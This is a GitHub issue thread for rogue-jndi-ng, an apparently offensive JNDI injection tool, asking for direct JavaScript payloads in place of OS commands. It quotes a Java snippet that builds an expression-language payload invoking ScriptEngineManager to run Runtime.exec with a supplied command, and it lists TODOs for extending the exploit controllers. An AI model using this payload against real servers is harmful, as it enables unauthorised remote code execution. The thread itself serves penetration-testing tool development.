### ISSUE TITLE
Missing support for direct JavaScript payloads

### ISSUE THREAD

**Issue by h0ng10** [mogwailabs/rogue-jndi-ng#2]
Rouge-jndi currently only allows the execution of OS commands. Until Java 17, it was possible to execute directly JavaScript code, a feature that is currently used by the Tomcat controller. 

```Java
String payload = ("{" +
            "\"\".getClass().forName(\"javax.script.ScriptEngineManager\")" +
            ".newInstance().getEngineByName(\"JavaScript\")" +
            ".eval(\"java.lang.Runtime.getRuntime().exec(${command})\")" +
            "}")
            .replace("${command}", makeJavaScriptString(Config.command));
```
Instead of passing a OS command, it should be possible to pass a file with JavaScript code that would be executed directly. 

TODOs:

- Update the Tomcat controller, so that it passes the content of the JavaScript file to the ScriptEngineManager
- Check the other controllers, if they can be modified to support this as well. In case of the Groovy Controller, it might be possible to pass a Groovy script 
- Update the HTTP Server, so that the class file that is downloaded includes the content of the JavaScript file.

**Comment by theGEBIRGE** [comment]
Implemented with ac433484d135087194b75683f6d4b335e13e2ca3.
